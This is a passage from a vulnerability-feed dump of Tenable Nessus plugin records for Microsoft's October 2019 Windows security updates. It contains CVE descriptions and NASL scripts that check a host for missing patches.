successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520002.NASL", "href": "https://www.tenable.com/plugins/nessus/129720", "published": "2019-10-08T00:00:00", "title": "KB4520009: Windows Server 2008 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129720);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1338\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1362\",\n \"CVE-2019-1364\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520002\");\n script_xref(name:\"MSKB\", value:\"4520009\");\n script_xref(name:\"MSFT\", value:\"MS19-4520002\");\n script_xref(name:\"MSFT\", value:\"MS19-4520009\");\n\n script_name(english:\"KB4520009: Windows Server 2008 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520009\nor cumulative update 4520002. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4520002/windows-server-2008-update-kb4520002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72b9f640\");\n # https://support.microsoft.com/en-us/help/4520009/windows-server-2008-update-kb4520009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e19f82ff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4520009 or Cumulative Update KB4520002.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520009', '4520002');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520009, 4520002])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520008.NASL", "href": "https://www.tenable.com/plugins/nessus/129724", "published": "2019-10-08T00:00:00", "title": "KB4520008: Windows 10 Version 1803 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129724);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520008\");\n script_xref(name:\"MSFT\", value:\"MS19-4520008\");\n\n script_name(english:\"KB4520008: Windows 10 Version 1803 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520008/windows-10-update-kb4520008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ed66c5d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520008');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520008])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:20:00", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520011.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. 